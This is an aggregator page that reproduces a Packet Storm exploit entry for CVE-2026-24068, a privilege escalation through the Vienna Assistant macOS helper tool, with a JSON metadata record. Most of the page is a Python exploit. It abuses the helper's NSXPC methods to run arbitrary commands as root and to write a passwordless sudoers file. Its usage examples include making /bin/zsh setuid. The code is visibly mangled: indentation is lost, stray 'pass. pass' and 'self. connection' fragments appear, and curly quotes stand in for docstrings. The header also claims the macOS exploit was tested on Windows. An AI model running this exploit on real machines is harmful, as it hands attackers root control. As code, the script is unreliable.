📄 Vienna Assistant 1.2.542 macOS Privilege Escalation_PACKETSTORM:219877

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

A macOS helper service interface implemented via NSXPC was observed exposing methods that may allow privileged operations such as file writing and command execution through a remote proxy connection...

Visit Original Source

Basic Information

ID PACKETSTORM:219877

Published Apr 27, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Vienna Assistant 1.2.542 macOS NSXPC HelperTool Interface Abuse Leading to Potential Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.vsl.co.at/ |
==================================================================================================================================

[+] Summary : A macOS helper service interface implemented via NSXPC was observed exposing methods that may allow privileged operations such as file writing and command execution through a remote proxy connection.

[+] POC :

#!/usr/bin/env python3

import objc
from Foundation import *
import sys
import os

objc.loadBundle('Foundation', globals(), '/System/Library/Frameworks/Foundation.framework')

class HelperToolProtocol(objc.protocolNamed('HelperToolProtocol')):
pass. pass

class ExploitClient:
def __init__(self):
self. connection = None

def connect(self):
“Contact HelperTool”
try:
self.connection = NSXPCConnection.alloc().initWithMachServiceName_options_(
"com.vsl.HelperTool", 0
)
self.connection.setRemoteObjectInterface_(
NSXPCInterface.interfaceWithProtocol_(HelperToolProtocol)
)
self.connection.resume()

if self.connection is None:
print("[-] Connection object is None")
return False

print("[+] Connected to HelperTool service")
return True
except Exception as e:
print(f"[-] Connection failed: {e}")
return False

def write_file(self, path, content):
“Write a file anywhere as root.”
try:
if not self.connection:
print("[-] No active connection")
return False

remote = self.connection.remoteObjectProxy()
data = content.encode('utf-8')
nsdata = NSData.dataWithBytes_length_(data, len(data))

if not remote:
print("[-] Remote proxy unavailable")
return False

remote.writeReceiptFile_withData_withReply_(path, nsdata, lambda error: None)
print(f"[+] File written: {path}")
return True
except Exception as e:
print(f"[-] Failed to write file: {e}")
return False

def execute_command(self, command, args=None):
"Execute command as root"
if args is None:
args = []

if not self.connection:
print("[-] No active connection")
return False

nsargs = NSMutableArray.array()
for arg in args:
nsargs.addObject_(arg)

try:
remote = self.connection.remoteObjectProxy()

if not remote:
print("[-] Remote proxy unavailable")
return False

remote.runUninstaller_withArgs_withReply_(command, nsargs, lambda error: None)
print(f"[+] Command executed: {command} {' '.join(args)}")
return True
except Exception as e:
print(f"[-] Command execution failed: {e}")
return False

def main():
print("=" * 60)
print("CVE-2026-24068 - Vienna Assistant Privilege Escalation")
print("macOS Local Privilege Escalation Exploit")
print("=" * 60)
print()

if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <command> [args...]")
print()
print("Examples:")
print(f" {sys.argv[0]} /bin/bash -c 'id > /tmp/test.txt'")
print(f" {sys.argv[0]} /usr/bin/whoami")
print(f" {sys.argv[0]} /bin/bash -c 'chmod 4755 /bin/zsh'")
sys. exit(1)

client = ExploitClient()
if not client.connect():
print("[-] Failed to connect. Is Vienna Assistant installed?")
sys. exit(1)

command = sys.argv[1]
args = sys.argv[2:] if len(sys.argv) > 2 else []

print(f"[*] Executing: {command} {' '.join(args)}")
client.execute_command(command, args)

print("\n[*] Attempting additional exploitation methods...")
current_user = os.environ.get('USER') or "attacker"

sudoers = f"{current_user} ALL=(ALL) NOPASSWD: ALL\n"
client.write_file(f"/etc/sudoers.d/{current_user}", sudoers)

client.write_file("/tmp/vienna_exploited.txt", "Vienna Assistant CVE-2026-24068 exploited successfully!\n")

print("\n[+] Exploit completed!")
print("[*] Verification: cat /tmp/vienna_exploited.txt")

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-27T16:30:33",
    "description": "A macOS helper service interface implemented via NSXPC was observed exposing methods that may allow privileged operations such as file writing and command execution through a remote proxy connection...",
    "published": "2026-04-27T00:00:00",
    "modified": "2026-04-27T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Vienna Assistant 1.2.542 macOS Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219877",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-24068"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Vienna Assistant 1.2.542 macOS NSXPC HelperTool Interface Abuse Leading to Potential Privilege Escalation        |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.vsl.co.at/                                                                                           |\n    ==================================================================================================================================\n    \n    [+] Summary    : A macOS helper service interface implemented via NSXPC was observed exposing methods that may allow privileged operations such as file writing and command execution through a remote proxy connection.\n    \n    [+] POC        :  \n    \n    #!/usr/bin/env python3\n    \n    import objc\n    from Foundation import *\n    import sys\n    import os\n    \n    objc.loadBundle('Foundation', globals(), '/System/Library/Frameworks/Foundation.framework')\n    \n    class HelperToolProtocol(objc.protocolNamed('HelperToolProtocol')): \n    pass. pass\n    \n    class ExploitClient: \n    def __init__(self): \n    self. connection = None \n    \n    def connect(self): \n    \u201cContact HelperTool\u201d \n    try: \n    self.connection = NSXPCConnection.alloc().initWithMachServiceName_options_( \n    \"com.vsl.HelperTool\", 0 \n    ) \n    self.connection.setRemoteObjectInterface_( \n    NSXPCInterface.interfaceWithProtocol_(HelperToolProtocol) \n    ) \n    self.connection.resume() \n    \n    if self.connection is None: \n    print(\"[-] Connection object is None\") \n    return False \n    \n    print(\"[+] Connected to HelperTool service\") \n    return True \n    except Exception as e: \n    print(f\"[-] Connection failed: {e}\") \n    return False \n    \n    def write_file(self, path, content): \n    \u201cWrite a file anywhere as root.\u201d \n    try: \n    if not self.connection: \n    print(\"[-] No active connection\") \n    return False \n    \n    remote = self.connection.remoteObjectProxy() \n    data = content.encode('utf-8') \n    nsdata = NSData.dataWithBytes_length_(data, len(data)) \n    \n    if not remote: \n    print(\"[-] Remote proxy unavailable\") \n    return False \n    \n    remote.writeReceiptFile_withData_withReply_(path, nsdata, lambda error: None) \n    print(f\"[+] File written: {path}\") \n    return True \n    except Exception as e: \n    print(f\"[-] Failed to write file: {e}\") \n    return False \n    \n    def execute_command(self, command, args=None): \n    \"Execute command as root\" \n    if args is None: \n    args = [] \n    \n    if not self.connection: \n    print(\"[-] No active connection\") \n    return False \n    \n    nsargs = NSMutableArray.array() \n    for arg in args: \n    nsargs.addObject_(arg) \n    \n    try: \n    remote = self.connection.remoteObjectProxy() \n    \n    if not remote: \n    print(\"[-] Remote proxy unavailable\") \n    return False \n    \n    remote.runUninstaller_withArgs_withReply_(command, nsargs, lambda error: None) \n    print(f\"[+] Command executed: {command} {' '.join(args)}\") \n    return True \n    except Exception as e: \n    print(f\"[-] Command execution failed: {e}\") \n    return False\n    \n    def main(): \n    print(\"=\" * 60) \n    print(\"CVE-2026-24068 - Vienna Assistant Privilege Escalation\") \n    print(\"macOS Local Privilege Escalation Exploit\") \n    print(\"=\" * 60) \n    print() \n    \n    if len(sys.argv) < 2: \n    print(f\"Usage: {sys.argv[0]} <command> [args...]\") \n    print() \n    print(\"Examples:\") \n    print(f\" {sys.argv[0]} /bin/bash -c 'id > /tmp/test.txt'\") \n    print(f\" {sys.argv[0]} /usr/bin/whoami\") \n    print(f\" {sys.argv[0]} /bin/bash -c 'chmod 4755 /bin/zsh'\") \n    sys. exit(1) \n    \n    client = ExploitClient() \n    if not client.connect(): \n    print(\"[-] Failed to connect. Is Vienna Assistant installed?\") \n    sys. exit(1) \n    \n    command = sys.argv[1] \n    args = sys.argv[2:] if len(sys.argv) > 2 else [] \n    \n    print(f\"[*] Executing: {command} {' '.join(args)}\") \n    client.execute_command(command, args) \n    \n    print(\"\\n[*] Attempting additional exploitation methods...\") \n    current_user = os.environ.get('USER') or \"attacker\" \n    \n    sudoers = f\"{current_user} ALL=(ALL) NOPASSWD: ALL\\n\" \n    client.write_file(f\"/etc/sudoers.d/{current_user}\", sudoers) \n    \n    client.write_file(\"/tmp/vienna_exploited.txt\", \"Vienna Assistant CVE-2026-24068 exploited successfully!\\n\") \n    \n    print(\"\\n[+] Exploit completed!\") \n    print(\"[*] Verification: cat /tmp/vienna_exploited.txt\")\n    \n    \n    if __name__ == \"__main__\": \n    main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219877",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219877/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply